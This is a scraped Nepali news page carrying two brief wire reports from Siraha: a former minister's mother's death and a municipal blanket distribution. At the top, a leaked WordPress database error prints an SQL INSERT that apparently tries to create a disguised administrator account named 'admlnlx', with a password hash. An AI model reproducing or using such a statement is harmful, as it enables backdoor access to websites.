WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqVJtLwVJ1RQWpakHJZGuDqx.h9elz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 11:03:41', '', 'admlnlx', 'admlnlx')
लहान, पुस २८ –
नेकपा ९माओवादी केन्द्र०का स्थायी समिति सदस्य एवम् पूर्वमन्त्री विश्वनाथ साहलाई मातृ शोक परेको छ ।
साहका आमा सागरदेवी साहको सिरहाको गोलबजार नगरपालिका–४ स्थित आफ्नै घरमा गएराति ९६ वर्षको उमेरमा निधन भयो ।
मुटु र दम रोगबाट लामो समयदेखि पीडित सागरदेवीको राति ९ बजेतिर निधन भएको पूर्वमन्त्री साहले जानकारी दिनुभयो । आमाको आजै गृह गाउँमै अन्त्येष्टि गरिने उहाँले बताउनुभयो । स्व साहको चार छोरा र दुई छोरी छन् ।
नगरपालिकाद्वारा कम्बल वितरण
सिरहाको सुखिपुर नगरपालिकाले बढ्दो चिसोलाई मध्यनजर गरी गरिब विपन्न परिवारलाई आज बिहान कम्बल वितरण गरेको छ ।
नगरपालिकाको विभिन्न वडाका ७५ जना अति गरिब, विपन्न, असहाय परिवारलाई कम्बल वितरण गरिएको नगरपालिकाका कार्यकारी अधिकृत जयराम पजियारले जानकारी दिनुभयो ।
विगत केही दिनदेखिको अत्यधिक चिसोका कारण अति गरिब विपन्न परिवार बढी प्रभावित भएकाले राहतस्वरुप कम्बल वितरण गरिएको कार्यकारी अधिकृत पजियारले बताउनुभयो । – रासस